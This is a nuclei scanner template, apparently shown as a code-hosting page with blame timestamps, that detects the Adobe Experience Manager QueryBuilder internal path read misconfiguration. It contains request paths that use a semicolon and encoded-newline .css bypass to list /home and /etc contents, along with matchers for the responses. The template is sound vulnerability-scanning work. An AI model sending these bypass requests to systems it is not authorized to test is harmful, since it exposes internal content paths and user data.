nuclei-templates/misconfiguration/aem/aem-querybuilder-internal-p...

30 lines
881 B
YAML
Raw Normal View History

id: aem-querybuilder-internal-path-read
info:
author: DhiyaneshDk
name: AEM QueryBuilder Internal Path Read
severity: medium
reference: https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91
tags: aem
requests:
- method: GET
path:
- '{{BaseURL}}/bin/querybuilder.json.;%0aa.css?path=/home&p.hits=full&p.limit=-1'
- '{{BaseURL}}/bin/querybuilder.json.;%0aa.css?path=/etc&p.hits=full&p.limit=-1'
- '{{BaseURL}}/bin/querybuilder.json.css?path=/home&p.hits=full&p.limit=-1'
- '{{BaseURL}}/bin/querybuilder.json.css?path=/etc&p.hits=full&p.limit=-1'
2021-04-05 18:25:18 +00:00
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200
2021-04-05 18:25:18 +00:00
- type: word
words:
2021-04-05 18:25:18 +00:00
- 'jcr:path'
2021-04-13 19:54:00 +00:00
- 'success'
2021-04-05 18:25:18 +00:00
condition: and